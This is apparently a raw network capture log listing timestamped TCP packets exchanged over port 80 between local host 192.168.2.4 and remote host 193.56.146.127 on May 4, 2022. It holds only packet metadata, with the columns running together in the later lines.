May 4, 2022 16:21:18.850953102 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.850958109 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.850980043 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.850981951 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851001978 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851010084 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851022959 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851037979 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851062059 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851080894 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851098061 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851103067 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851125956 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851125956 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851151943 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851161003 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851181984 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851212978 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851213932 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851234913 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851260900 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851278067 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851303101 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851314068 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851342916 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851353884 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851365089 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851392031 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851414919 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851421118 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851458073 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851479053 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851481915 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851504087 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851505995 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851527929 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851548910 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851551056 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851555109 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851586103 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851588011 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851613998 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851619005 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851641893 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851650000 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851680994 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851712942 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851717949 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851741076 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851768017 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851768017 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851794004 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.851804972 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851834059 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.851866007 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916172028 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916198969 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916223049 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916265965 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916270018 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916290045 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916325092 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916330099 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916368961 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916371107 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916404009 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916410923 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916439056 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916462898 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916466951 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916528940 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916538954 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916553020 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916589975 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916610003 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916610003 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916635036 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916667938 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916678905 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916687012 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916709900 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916733980 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916763067 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916775942 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916804075 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916810989 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916829109 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916863918 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916867971 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916898012 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916924000 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.916925907 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.916982889 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.921539068 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921562910 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921587944 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921606064 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921627998 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921652079 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921760082 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921788931 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921811104 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921827078 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921849012 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921879053 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921901941 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921922922 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921947002 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.921969891 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922009945 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922032118 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922055960 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922077894 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922101974 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922126055 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922311068 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922336102 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922358036 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922385931 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922405005 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922415972 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922442913 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922467947 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922529936 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922559023 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922703981 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922734022 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922761917 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922791004 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922842026 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922967911 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.922996998 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.923027039 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.923057079 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.923084974 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.926552057 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.926583052 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.926681042 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.926717997 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.926757097 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986505032 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986555099 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986596107 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986635923 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986639023 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986670971 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986674070 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986712933 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986728907 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986753941 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986766100 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986779928 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986795902 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986835003 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986839056 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986871004 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986911058 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986917973 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986937046 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986941099 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.986951113 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.986989975 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987010956 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987029076 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987051964 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987087965 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987126112 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987132072 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987169027 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987195015 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987211943 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987232924 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987250090 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987272024 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987287998 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987309933 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987328053 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987346888 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987363100 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987385035 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987400055 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987422943 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987442017 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987462044 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987502098 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987538099 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987546921 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987574100 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987575054 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987610102 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987612963 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987644911 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987648964 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987668991 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987685919 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987723112 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987726927 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987737894 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987760067 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987773895 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987798929 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987813950 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987834930 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987850904 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987871885 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987885952 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987910986 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987921953 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987946987 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987962961 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.987984896 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.987998009 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.988023996 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988035917 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.988061905 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988073111 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.988102913 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988118887 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.988138914 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988154888 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.988177061 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988190889 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.988214970 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988234043 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:18.988253117 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988290071 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988322973 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:18.988549948 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:19.278884888 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:19.983093977 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:20.052925110 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.052984953 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053040981 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053062916 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:20.053112030 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053191900 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053231955 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053307056 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053374052 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053416014 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053447962 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053488970 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053530931 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053572893 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053615093 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053674936 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053709030 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053760052 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053801060 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053841114 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053884029 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053934097 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.053991079 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.054035902 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.054075956 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.054116964 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.054176092 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.054238081 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.054508924 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:20.054523945 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:20.054527044 CEST    49823    80       192.168.2.4       193.56.146.127
May 4, 2022 16:21:20.123567104 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123626947 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123686075 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123749971 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123797894 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123842955 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123884916 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123924971 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.123965025 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.124007940 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.124052048 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.124094009 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.124134064 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.124176979 CEST    80       49823    193.56.146.127    192.168.2.4
May 4, 2022 16:21:20.124218941 CEST    80       49823    193.56.146.127    192.168.2.4
                                                        May 4, 2022 16:21:20.124259949 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124301910 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124341965 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124383926 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124428034 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124466896 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124546051 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124588013 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124629974 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124671936 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124715090 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124754906 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124785900 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124818087 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124860048 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124897957 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124938965 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.124982119 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125020981 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125061989 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125102997 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125142097 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125183105 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125225067 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125267982 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125309944 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125349998 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125390053 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125431061 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125471115 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125511885 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125554085 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125597000 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125639915 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125680923 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125721931 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125763893 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125802994 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.125844955 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.126540899 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:20.126579046 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:20.126652956 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:20.126660109 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:20.126673937 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:20.126729012 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:20.195859909 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.195903063 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.195935011 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.195966005 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.195997953 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196027994 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196057081 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196089983 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196120977 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196154118 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196186066 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196216106 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196247101 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196276903 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196306944 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196341038 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196365118 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196388960 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196419954 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196449995 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196508884 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196542978 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196574926 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196605921 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196635008 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196664095 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:20.196695089 CEST8049823193.56.146.127192.168.2.4
